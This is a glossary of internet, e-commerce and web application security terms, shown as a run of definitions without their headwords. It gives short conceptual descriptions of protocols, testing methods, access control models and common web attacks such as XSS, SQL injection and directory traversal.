Also known as Rijndael, a block cipher encryption standard that creates keys from 128 bits to 256 bits in length.

Adware is any software application in which advertising banners are displayed while the program is running.

In this model, companies affiliated with advertising agencies place ads on their sites for a financial incentive.

A method for voice transmissions using a continuous signal that varies in frequency, amplitude, and range.

The process of securing applications in use on a network.

The early search tool of Gopher.

The first computer network based on the packet-switching principle.

Execution of a plan to bypass security of systems and gain unauthorized access to a resource.

Establishing an audio meeting over a network or PSTN line.

Keeping records of operations and transactions to assess the accuracy of processes.

A protocol primarily responsible for the authentication and integrity verification of data packets. AH does not provide any form of encryption.

The process of establishing the validity of a person's identity.

The process of giving an individual access to information after authentication.

Identifies all of the files within a given directory on a Web server if the base file is not found. The base files refer to such files as index.html, default.htm, index.php, and so on.

The degree to which a system is operable and committable at a start of a process or function.

A processing strategy in which transactions are not handled immediately; rather, receipts are collected and processed as a batch.

A software testing methodology that looks at available inputs for an application and the expected outputs from each input.

A practice to define what is unacceptable, excluding all other input as acceptable.

The percentage of single-page visits to a Web site, or those visitors that "bounce away" to another site. The bounce rate is a standard measure of quality and relevance to the visitor. The lower the bounce rate, the better the site.

The result when an attacker compromises authentication credentials, gaining access to all resources associated with those credentials. Social engineering is a common method of obtaining user IDs and passwords.

An attack that attempts to crack a cryptographic key.

Occurs in an application when more information is stored in the buffer than the space reserved for it.

A centralized system through which users can exchange messages; a message board.

Software used to maintain personal or group schedules.

Backtracking up a directory path using "../" or dot, dot, slash to access areas not intended to be accessible.

Mechanisms used to protect against automated attacks. The function of CAPTCHA is to provide a challenge/response mechanism to help ensure that a Web form is being filled out by a human and not an automated process.

Named when carbon paper was used to make a copy, this is an e-mail sent to one or more recipients apart from the primary (To:) recipient.

Processing is offloaded from the client onto a centralized server. Cloud computing is an example of centralized processing.

A standardized approach to handling changes to the IT infrastructure.

A dedicated, physical, point-to-point connection between the sending and receiving devices.

Measures the number of times an Internet ad is clicked, versus the times it's viewed.

An agreement that outlines what can and cannot be done with the personal data of visitors to a Web site.

A computing environment in which one machine (the client) makes requests while another machine (the server) fulfills the requests.

Input validation mechanisms on the client side using the client browser.

Delivering hosted services over the Internet, which includes providing infrastructures, platforms, and software as services.

A standard that enables communication between Web forms and your program.

Centralized storage for unified messages.

Run for the Department of Homeland Security by the MITRE Corporation, a basic description of computer application and operating system vulnerabilities.

A software testing method designed to verify how well an application functions with other software, such as the operating system or other Web applications. Interoperability is a significant concern, and application testing must ensure compatibility with other popular software.

CIRTs are now normally higher level coordination bodies with wider responsibilities for vulnerability and attack research and issuing warning and vulnerability notices. The original term for what is now commonly called a CSIRT.

An all-hours or on-call group for an organization, corporation, or country designed to respond to online attacks or similar events. May also be called an information system incident response team (ISIRT).

Ensuring that information is accessible only to authorized users.

How mobile phones handle Web and multimedia content intended for more powerful systems with larger screens.

Creating a fake Web site or Web application and fooling victims into thinking it is a legitimate one. An attacker lures victims to an authentic-looking but illegitimate Web site. The attacker then steals logon credentials, credit card information, or other forms of personal data.

The evolution of different types of devices into a more common form that has a combination of features.

Represents the percentage of visitors who perform a desired action against those that do not. The higher the conversion rate, the better the site.

Represents the amount an advertiser pays each time a user clicks an ad.

A cybercriminal intending harm to systems and networks.

Exploits the trust a Web site has for a user's browser. This can occur because once a visitor is authenticated and logged onto a particular Web site, that site trusts all requests that come from the browser.

A well-known Web application vulnerability in which attempts are made to execute malicious code by injecting it and running it in the client browser. If the script code can be executed, the attacker may have access to your data, financial information, and more. See also XSS attack.

The confidential component of a cryptographic system. The key defines how the cryptographic algorithm converts plaintext to encrypted text and back.

Constant and unwelcome electronic tracking of another person.

An encryption standard using a 56-bit key encryption method.

An attack that can result in decreased availability of the targeted system.

The environment in which programmers develop, test, and upgrade software systems applications. Compare with a production environment.

A small electronic file that serves to validate or encrypt a message or browser session. Digital certificates are often used to create a digital signature which offers non-repudiation of a user or a Web site.

A method of voice transmissions in which sounds are encoded digitally as a series of numbers that represent pitch and volume at each instant in time.

An access control method in which access is not forced from the administrator or the operating system; rather, access is controlled by the information's owner.

An application whose processing is divided across multiple computers over a network. Typically, the divisions, or tiers, are presentation, business logic, and data store layers.

An organized, hierarchical division of DNS names.

A hierarchical system for naming resources on a network as well as providing translation between the resource's IP address and its domain name.

The buying and selling of goods and services over electronic systems such as the Internet.

Currency that you purchase with a credit, charge, or debit card, and then download to your computer or smart card.

An electronic storage device for electronic currency and information about the owner of the wallet.

The process of identifying potentially risky e-mail and stopping it from reaching the end user.

A program that can identify a potentially risky e-mail and stop it from reaching the end user.

A protocol that provides encryption services to network data. Can also be used for authentication and integrity services. Differs from AH authentication in that ESP includes only the ESP header, trailer, and payload portions of a data packet. The IP header is not protected, unlike with AH, which protects the entire data packet.

The process of encoding information. The act of making text or data unreadable without possession of a translation key.

A device or system that connects users to a communications or data network.

Identifying the types of services components that are running on a system.

An electronic tablet device that allows a user to download, store, and read digital books.

A set of rules for encoding documents electronically. XML was chosen as the standard message format because of its widespread use and open source development efforts.

Occurs when an attacker browses unprotected areas and data on a Web server. This attack is enabled by Web applications that fail to restrict vulnerabilities.

A computer-based fax machine.

A software state in which development continues but no additional features are added to the product.

A regularly updated U.S. federal government project that sets a minimum security configuration for Microsoft Windows XP and Windows Vista computers that are used as general-purpose desktops.

A protocol used for file exchange.

Identifying the type and version of operating system that is running on a system.

A worldwide voluntary and collaborative body bringing together incident response teams and related organizations. It encourages rapid and secure communications between affected communities and allows in-confidence information sharing. It also supports an annual conference and hosts special interest groups and regular training events.

Google's proprietary Web-based office application software that offers word processing, spreadsheets, and presentations.

An early computer network that featured searches through a file tree.

An interface based on graphical elements as opposed to text only.

A software testing methodology that provides the middle ground between black box and white box testing. It looks at the input and output of applications and the inner workings of the application.

A system of tools that facilitates group collaboration. Groupware may include calendar software and instant messaging applications.

A non-enforced suggestion for increasing functioning and performance.

Generally known as a cybercriminal. However, hackers are actually well-intentioned or "good" infiltrators who edit and modify applications. Crackers are those with malicious intent. Most people today use the term "hacker" to mean "cracker."

A carefully monitored system set up by security professionals to be attacked, so that attack sources and methods can be analyzed.

Security measures such as firewalls, IDSs, and antivirus solutions installed directly on a client system.

Text as non-sequential links to other text or documents.

A set of tags, or rules, primarily used to specify formatting of Web documents.

A transfer protocol for exchanging hypertext documents over the Internet or an intranet.

Combines the HTTP protocol with the SSL protocol to provide secure online transactions.

Assuming the online identity of a person.

From a Web site or Web application perspective, an attacker's attempt to use the session credentials of a valid user.

An automatic process in which software programs known as spiders or bots examine Web sites collecting data and analyzing the Web sites' keywords. The results are stored and indexed in the search engine's database.

The exploitation by an attacker of information found or gathered which was intended only for authorized users.

Delivery of infrastructure on demand, usually billed per amount of resources consumed.

Enables an attacker to bypass an application's access controls and create, change, delete, or read any data the application can access. The end result is compromised data. One of the most common forms of an injection flaw attack is the SQL injection attack.

The verification of all data that is received. This helps prevent malicious data from entering an application. Input validation is a form of filtering in which unexpected or unwanted input is automatically rejected and the underlying database remains inaccessible.

A threat that occurs when an administrator fails to secure directories and folders in a Web server. Enables an attacker to traverse through a Web server's directories, leading to the access of sensitive resources and information leakage. Also referred to as directory traversal.

A program that allows users to exchange messages in real time.

A software testing method in which individual software modules are combined and tested as a group. Integration testing typically occurs after unit testing.

Emphasizes the need for information to be delivered unaltered to the recipient.

A nonprofit professional and certification body that provides related programs for information security professionals.

A protocol that manages the SA negotiation process for IPSec connections.

A TCP/IP protocol designed for downloading, or pulling, e-mail from a mail server. IMAP is used because although the mail is transported around the network via SMTP, users cannot always read it immediately, so it must be stored in a central location. From this location, it needs to be downloaded, which is what IMAP allows you to do.

The set of techniques used by many hosts for transmitting data over the Internet. Internet Protocol version 4 (IPv4) is still in common use today. IPv4 addresses use 32 bits. Internet Protocol version 6 (IPv6) is a more recent version of IP, and it uses 128 bits.

Secures communication between systems within a network as well as communications transmitted outside a LAN; can be used to encrypt, authenticate, and verify the integrity of communications.

An early form of synchronous online conferencing.

A security mechanism that monitors data packets traveling across a network, comparing traffic against parameters of known threats. An IDS is a passive security measure in that it only monitors the network and doesn't take steps to mitigate the risk.

A security mechanism that monitors and reacts to data packets traveling across a network. An IPS is an active security measure because it not only monitors but also blocks suspect traffic identified by the device.

A unique numeric value assigned to a device in a network.

The international standard for accrediting schemes that certify personal competences.

A scripting programming language most commonly used to add interactive features to Web pages.

A delay. Can apply to the sending, processing, transmission, storage, or receiving of information.

See principle of least privilege.

A protocol that provides a mechanism to access and query directory services systems. Directory services include systems such as Novell Directory Services (NDS) and Microsoft Active Directory, database servers, Web servers, and Web application servers.

A computer network covering a small physical area, such as an office or the floor of a building.

Designed to infect, corrupt, and damage Microsoft Office documents.

A high-performance computer usually used by large businesses requiring large-scale processing and availability.

Software designed to damage or disrupt the operation of a system. Also referred to as malware.

Software designed to damage or disrupt the operation of a system, such as a Trojan horse, worm, or virus. Also known as malicious software.

An illegitimate announcement of new malware.

An access control mechanism in which access is controlled and dictated by the network administrator.

An attack that relies on eavesdropping between the sender and receiver. Attackers use their position to listen and perhaps redirect or alter communication.

A form of blogging using limited content, such as Twitter.

A computer of medium size with less processing capability than a mainframe, but more than a PC.

The ability to communicate at broadband (cable modem/DSL or faster) speeds while being connected to a cellular network.

A service provided by cellular networks that allows the sending and receiving of multimedia messages between users. MMS content includes audio, video, digital images, ringtones, and more.

A specification from the Open Mobile Alliance. The specification details implementation requirements for any organization interested in providing Multimedia Messaging Service.

Presence information is aggregated from several devices to a single presence status. The reported status is provided to other users.

A protocol within the TCP/IP protocol suite designed to synchronize clocks of computer systems over packet-switched networks.

A copyright or licensing system that, compared with conventional commercial licensing schemes, allows wide use and modification of the material.

An organization that researches and publishes known security threats to Web applications and Web services.

The way applications control their output data. Output data from an application may take the form of logging, printing, coding, error messages, or raw data to be passed on to another application.

Companies send their information to third-party service providers for storage, processing, or transmission.

A method for moving data over a network. Data is split into chunks (packets), and each packet contains destination details. The packets of the original entity being transmitted are recomposed at the destination. Packets may travel though different paths from the source to the destination in the network.

A secret word used for authentication.

An attack in which the attacker attempts to circumvent acceptable file and directory areas to access files, directories, and data located elsewhere on the server. This is accomplished by changing the URL to point to other areas on the server.

A set of standards designed to help organizations that process credit card payments prevent fraud by having increased control over data and its exposure.

An affiliate-based e-commerce model where sites pay affiliates for generating traffic to them.

A transaction broker that facilitates payments between individuals or individuals and businesses. Located at http://www.paypal.com.

An attempt to circumvent various layers of a system or application's security controls for the purpose of seeing how far into the system the attacker can get.

A software testing method that provides an accurate view of how applications perform in a large-scale deployment in a variety of production environments. These tests determine responsiveness under various workloads to ensure that the application works well under normal operational circumstances.

An authentication method that validates a user.

A scam in which an impostor pretends to be a legitimate entity and tries to lure customers into divulging confidential information.

A type of computer security that includes tangible protection devices.

The act of sending TCPIP packets to various IP addresses and determining which of those addresses are active based on the responses that are received.

Delivery of a computing platform as a service.

A podcast is a recorded audio program available for download from a Web site.

Protocol used to establish and secure VPN connections.

An organization's documented basic requirements supported by senior management.

A single point of access to a collection of resources.

The state or availability of a remote object.

The ability and willingness of an end user to engage in communication. The information is controlled by the end user and gives real-time confidence that the user is accessible. Delivery is not automatic, but relies on technology or applications being enabled to provide it.

The concept of providing users with as few privileges as possible, just enough to fulfill their network needs. It is a security measure that ensures users are not granted more permissions than needed.

The protection of individual rights to non-disclosure.

A task or set of tasks performed to implement a process.

The correct sequence of steps in a transaction or online process.

A real-world practical environment in which applications are used for business purposes. Compare with a development environment.

Communication protocol used to secure communications over an IP network.

A defined policy or standard that users adhere to. Protocols are well-defined and accepted procedures. In computer networking, the term refers to algorithms for exchanging various types of data and their interpretation at origination and destination.

The global collection of interconnected public telephone networks designed primarily for voice traffic.

A person trained to conduct PCI DSS Security Assessments.

Web site visitors who are searching specifically for your goods or services.

A family of standardized Web feeds used to publish changes in recently updated work, such as news.

An immediate exchange of information.

A credit card transaction in which processing is immediate.

The protocol for the purpose of managing and maintaining the quality of RTP.

The protocol used for streaming audio or video in packets over an IP network.

A software testing method that gauges the recovery capabilities of an application in the event of failure. Recovery testing determines whether an application can recover from a crash or hardware failure.

Uses social engineering to initiate an XSS attack. A reflected XSS attack uses a malicious script that is embedded in a URL link to target a single victim.

A software testing method that checks for additional errors in software that may have been introduced in the process of upgrading or patching to fix other problems.

A legal restriction with legal consequences. Regulations are not set by an organization but by applicable laws.

A software testing method that ensures an application meets and adheres to appropriate standards.

A formal document from the Internet Engineering Task Force (IETF) that is the result of committee drafting and revision of a technical document.

A framework for conceptual modeling.

Source of danger, exposure to unauthorized use or compromise.

A family of secret key cryptographic algorithms from RSA Security, Inc. The family includes RC2, RC4, RC5, and RC6.

An access control mechanism in which access decisions are determined by the roles that individual users have as part of an organization.

A form of man-in-the-middle attack in which an intermediary attacker reroutes data to an alternate location.

An access control mechanism in which access to objects is controlled according to established rules.

A strategy for separating programs and running them in their own virtual space.

Inspection of user input for potentially harmful code and modifying the code according to predetermined guidelines. Sanitization often involves identifying and disallowing specific characters and syntax sequences.

Refers to the strategies used to make a site more browser-friendly.

Protection from inadvertent information disclosure.

The standard security technology for establishing an encrypted link between a Web server and a Web browser. This link ensures that all data passed between the Web server and browsers remains private and intact. SSL is an industry standard and is used by millions of Web sites to protect their online transactions with their customers.

A security agreement between two systems on a network that enables the secure exchange of data. For communication to occur, the sending system and receiving system must agree on the same SA.

A software testing method that checks the security of an application. This includes testing for injection attacks, path traversal attacks, and if the software is vulnerable in other ways. Vulnerabilities need to be addressed before the software can be released.

Combination of hardware and software intended to provide services to clients, usually over the Internet.

An injection attack that occurs on the server and not on the client system. In an SSI attack, malicious code is placed in a Web application that is then stored on the server. When the Web application is executed locally on the Web server, the malicious code carries out its function. The SSI injection attack is successful when the Web application is ineffective in filtering user-supplied input.

A unique client identifier sent over a wireless network as a simple password that is used for authentication between a wireless client and an access point.

The tracking of requests and communications between a Web server and a user. Because HTML is "stateless" by design, Web applications and Web sites must create a session to pass information and authentication from page to page.

The exploitation of a valid computer session to gain unauthorized access to information and services within the targeted computer system.

Identifies previous users to a Web site and stores user-specific information about a session.

An application-layer protocol designed to establish and maintain multimedia sessions.

Defines how systems handle and manage user sessions.

A service provided by cellular networks that allows the sending and receiving of short messages between users. SMS is more popularly known as "texting."

Protocol used for e-mail exchange.

A network endpoint that is enabled to function as a either a SIP user agent client or user agent server.

A SIP user agent that makes requests and receives responses.

A SIP user agent that acts as a proxy between two SIP user agent clients for the purpose of facilitating a SIP session. The UAS acts as both client and server to receive and forward session control requests and responses.

Software application that allows the user to make video and audio calls over the Internet.

A practice of obtaining confidential information by manipulating users in social communication.

A blanket term that describes social applications, including forums, message boards, blogs, wikis, and podcasts. Social media applications include Google, Facebook, and YouTube.

An online service designed to establish friendships and find like-minded people.

The mechanisms used to track and control changes in software.

The process of planning, designing, creating, testing, deploying, and maintaining software.

A software testing method that pushes an application to its limits to see where the breaking points are. Stress tests go well beyond normal, real-world scenarios trying to find the limits of an application.

A model of software deployment or service where customers use applications on demand.

Unwanted and unsolicited e-mail.

A form of malware that covertly gathers system information through the user's Internet connection without his or her knowledge.

A type of attack designed to break through database security and access the information. A SQL injection attack "injects" or manipulates SQL code.

An established and proven norm or method. A standard provides a means of ensuring quality by setting a uniform expectation for development.

The technique of relaying communications between two or more users by intermediate storage. Delivery from sender to a central storage is immediate, but the final transmission to the recipient depends upon availability and a request for the stored information.

An attack that embeds malicious script into a Web page that permits and stores user-supplied content, such as a social networking site or an online forum, where it will be accessible to multiple potential victims. The victim retrieves the malicious script from the Web server when it requests the stored information. Also known as a persistent XSS attack.

The special type of access control list that monitors attempts to get into secured objects on a system.

A software testing method that combines all components that have successfully passed integration testing and assesses the system as a whole. System testing tests combined components to determine their interoperability.

A protocol for sending faxes over an IP network or the Internet.

A protocol for synchronous access to a remote machine.

The unauthorized use of goods or services.

A protocol for packet switching used on the Internet.

As the successor to Secure Socket Layer (SSL), TLS provides secure communications at the Transport layer from end to end.

An encryption method that uses three 56-bit encryption keys.

A form of malware application hidden within another application that introduces backdoor access.

Trust logos and icons used to associate a Web site with a known and trusted entity.

Integration of voice, video, and Web or data conferencing. See also unified communications.

The combination of real time and non-real time into a single communication strategy. See also unified collaborative communications (UCC).

The storage of fax, e-mail, and voice communications in a single location.

A software testing method in which a programmer verifies that individual units of source code are fit for use. A unit is the smallest testable part of an application.

A protocol that emerged prior to high-speed Internet connections, which permitted the exchange of e-mail and Usenet news over dial-up link speeds.

A software testing method designed to check the usability of an application. This may be done in a limited production environment to get a sampling of potential application users. The usability test helps ensure that the application is user friendly and provides an intuitive interface.

The first Internet discussion service, started around 1980.

A search tool used across the Gopher network.

A secure communication tunnel used to connect a remote client to a network.

The creation of a virtual version of actual services, applications, or resources.

Malicious software that cannot spread to another computer on its own, without human assistance.

The storage of voice messages for later retrieval.

Technology allowing voice transmissions over the Internet.

The ongoing maintenance and management of existing Web sites and applications.

The infancy stage of the Web (1990-2003), based on presentation of information towards the users. Also referred to as the Static Web.

Web advancements between 2003 and 2010, where social networking activities and tools greatly improved. Also referred to as the Social Web.

The stage of the Web expected between 2010 and 2020. The focus will shift from documents and their relationships to data and its meaning, with services that are personally relevant to the user. Also referred to as the Semantic Web.

A software program containing computer scripts that interact with the end user. Examples include Web mail, shopping carts, portals, games, forums, forms, online auctions, and other interactive Web page elements.

A nonprofit group dedicated to improving application security practices.

A collection of languages used for describing ontologies.

A type of attack in which the attacker changes the appearance of a Web site. The attacker might replace a company's home page, for example, with a Web page that displays messages from the attacker.

A software testing methodology that examines the code of an application. This contrasts with black box testing, which focuses only on inputs and outputs of an application.

A practice to define what is acceptable, excluding all others as unacceptable.

A data communications network that encompasses a large geographical area and travels beyond the boundaries of a local area network.

Data encryption method used on 802.11 wireless LANs.

Commonly called the Web, a collection of HTML documents, audio, and video that resides on the Internet, which is accessible by browsers using the HTTP protocol.

Self-replicating malware designed to infect systems.

Used for navigating XML documents and for retrieving data from within them. User input and queries are used with XPath to access XML information.

An attack in which the attacker injects data into an application so that the application executes user-controlled XPath queries. When successfully exploited, this vulnerability may allow an attacker to bypass authentication mechanisms and access XML information without proper authorization.

An attack in which malicious scripts are saved to a Web server but run in a client browser. If the script code is executed, the attacker gains access to personal data on the Web server or the victim's personal computer.